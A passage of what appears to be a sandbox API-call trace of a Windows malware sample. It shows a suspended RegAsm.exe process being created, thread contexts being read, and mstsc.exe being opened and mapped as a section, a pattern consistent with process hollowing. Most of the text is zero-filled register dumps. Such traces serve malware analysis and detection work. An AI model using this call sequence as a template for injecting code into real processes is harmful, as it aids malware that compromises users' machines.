[322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0107.322] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegAsm.exe", lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0AJTD.txt.exe\" ", lpProcessAttributes=0x3870000, lpThreadAttributes=0x3870000, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x3870400*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3870800, hNewToken=0x0 | out: lpProcessInformation=0x3870800*(hProcess=0x11c, hThread=0x118, dwProcessId=0x970, dwThreadId=0xb70), hNewToken=0x0) returned 1 [0107.383] NtGetContextThread (in: ThreadHandle=0xfffffffe, Context=0x3875004 | out: Context=0x3875004*(ContextFlags=0x10010, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0107.390] NtOpenFile (in: FileHandle=0x18f620, DesiredAccess=0x1, ObjectAttributes=0x3871420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\syswow64\\mstsc.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x3871400, ShareAccess=0x1, OpenOptions=0x0 | out: FileHandle=0x18f620*=0x124, IoStatusBlock=0x3871400*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0107.444] NtGetContextThread (in: ThreadHandle=0xfffffffe, Context=0x3875004 | out: Context=0x3875004*(ContextFlags=0x10010, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0107.451] NtCreateSection (in: SectionHandle=0x18f61c, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x0, SectionPageProtection=0x2, AllocationAttributes=0x1000000, FileHandle=0x124 | out: SectionHandle=0x18f61c*=0x120) returned 0x0 [0107.472] NtGetContextThread (in: ThreadHandle=0xfffffffe, Context=0x3875004 | out: Context=0x3875004*(ContextFlags=0x10010, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, 